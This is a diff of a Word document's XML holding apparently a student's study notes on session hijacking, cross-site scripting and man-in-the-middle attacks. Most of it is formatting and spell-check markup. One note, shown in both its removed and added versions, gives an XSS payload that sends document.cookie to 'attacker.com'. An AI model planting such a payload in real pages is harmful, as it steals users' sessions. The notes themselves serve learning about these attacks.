-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>communicate with bank.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Doing this over the web .</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Some kind of communication going on.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Since its via the web,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it is packet based at a low level</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> , even though I can imagine it’s a connection.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Problem comes if connection between me and my bank is not as strong as it should be.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>What can happen in that case is that somebody else can come along and usurp the connection and take over here and continue communicating with the bank.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>We do have a problem with packet based communication</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> , is this communication between the 2 parties might be weak enough for somebody to break the connection, jump in and  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>assume (usurp)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
         <w:t>The role of bank ,take over the role.</w:t>
       </w:r>
     </w:p>
@@ -1577,7 +1672,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Session hijacking isn’t just a problem for packet based protocols like HTTP,</w:t>
       </w:r>
     </w:p>
@@ -1887,8 +1981,36 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>One is pwnfunction , other is hackfunction</w:t>
-      </w:r>
+        <w:t xml:space="preserve">One is </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>pwnfunction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> , other is </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hackfunction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -1946,84 +2068,185 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>What if we have control of javascript of another website</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Javascript has access to HTML via DOM API’s which are provided by browser. Can manipulate DOM and make it different ,like defacing page.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Can steal csrf tokens or read some cookies. Having access to javascript on another website in a different user’s context can be very problematic.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Can we inject js into another website? Yes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>That is exactly XSS ,a javascript injection technique.</w:t>
+        <w:t xml:space="preserve">What if we have control of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of another website</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> has access to HTML via DOM API’s which are provided by browser. Can manipulate DOM and make it different ,like defacing page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Can steal </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>csrf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tokens or read some cookies. Having access to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on another website in a different user’s context can be very problematic.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Can we inject </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>js</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> into another website? Yes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">That is exactly XSS ,a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> injection technique.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2376,7 +2599,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Scenario:</w:t>
       </w:r>
     </w:p>
@@ -2461,7 +2683,115 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;script&gt; var xhr = new XMLHttpRequest(); xhr.open("GET", "http://attacker.com/steal?cookie=" + document.cookie, true); xhr.send(); &lt;/script&gt; </w:t>
+        <w:t xml:space="preserve">&lt;script&gt; var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>xhr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(); </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>xhr.open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>("GET", "http://attacker.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>steal?cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=" + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, true); </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>xhr.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(); &lt;/script&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2629,6 +2959,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F59E8AB" wp14:editId="21ADE638">
             <wp:extent cx="5731510" cy="1271905"/>
@@ -2838,7 +3169,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>We need sessions as HTTP is stateless. Not built to keep information about users. Sessions help associate requests to other requests. Without sessions if you are on facebook page and want to visit profile, you would have to login again.</w:t>
+        <w:t xml:space="preserve">We need sessions as HTTP is stateless. Not built to keep information about users. Sessions help associate requests to other requests. Without sessions if you are on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>facebook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> page and want to visit profile, you would have to login again.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2967,6 +3316,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Anyway an attacker can gain control of user’s session without their knowledge.</w:t>
       </w:r>
     </w:p>
@@ -3028,7 +3378,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>3 ways to steal session key</w:t>
       </w:r>
     </w:p>
@@ -3194,7 +3543,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Cross site scripting (ilearn)</w:t>
+        <w:t>Cross site scripting (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ilearn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3374,6 +3741,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Modify other parts of webpage than just the search box .</w:t>
       </w:r>
       <w:r>
@@ -3434,8 +3802,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Can use URL shorteners to reduce the size of a fake URL like on Bitly.</w:t>
+        <w:t xml:space="preserve">Can use URL shorteners to reduce the size of a fake URL like on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Bitly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3475,14 +3860,29 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Need to skeptical about URL’s that have &lt;script&gt; tags and URL’s that involve a redirect.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="3454"/>
-        </w:tabs>
+        <w:t xml:space="preserve">Need to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>skeptical</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> about URL’s that have &lt;script&gt; tags and URL’s that involve a redirect.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
@@ -3514,18 +3914,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>Man in the middle attack</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3541,7 +3933,25 @@
           <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>A Man-in-the-Middle (MitM) attack is a cyberattack where the attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other. This type of attack can occur in both digital and physical communications. Here's a detailed explanation:</w:t>
+        <w:t xml:space="preserve">A Man-in-the-Middle (MitM) attack is a cyberattack where the attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>This type of attack can occur in both digital and physical communications. Here's a detailed explanation:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3554,6 +3964,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3563,6 +3974,7 @@
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>Interception:</w:t>
       </w:r>
@@ -3571,6 +3983,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
         <w:t xml:space="preserve"> The first step in a MitM attack is interception. The attacker positions themselves in a way that the data exchanged between the two parties passes through the attacker. This can be achieved through various methods, such as packet sniffing on a network, making malicious Wi-Fi access points, using software vulnerabilities, or physically tapping communication lines.</w:t>
       </w:r>
@@ -3585,6 +3998,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3594,6 +4008,7 @@
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Eavesdropping:</w:t>
       </w:r>
@@ -3602,6 +4017,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve"> Once the attacker intercepts the communication, they can eavesdrop on the exchange. This means they can read, listen to, or record the information being shared, which might include sensitive data like login credentials, personal information, or financial details.</w:t>
       </w:r>
@@ -3616,6 +4032,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3625,6 +4042,7 @@
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>Alteration and Injection:</w:t>
       </w:r>
@@ -3633,6 +4051,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
         </w:rPr>
         <w:t xml:space="preserve"> In more sophisticated MitM attacks, the attacker can alter the communication before passing it along. They might inject malicious links, change the details of a transaction, or manipulate the messages being sent.</w:t>
       </w:r>
@@ -3665,17 +4084,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> The attacker can also impersonate one or both parties, creating a scenario where each party believes they are communicating securely with the legitimate other party. This can lead to sensitive information being disclosed to the attacker.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> The attacker can also impersonate one or both parties, creating a scenario where each party believes they are communicating </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3683,6 +4093,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t>securely with the legitimate other party. This can lead to sensitive information being disclosed to the attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>MitM attacks are particularly dangerous because they can be hard to detect. The parties involved might not realize that there is an eavesdropper or an interceptor between them.</w:t>
       </w:r>
     </w:p>
@@ -5181,6 +5608,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
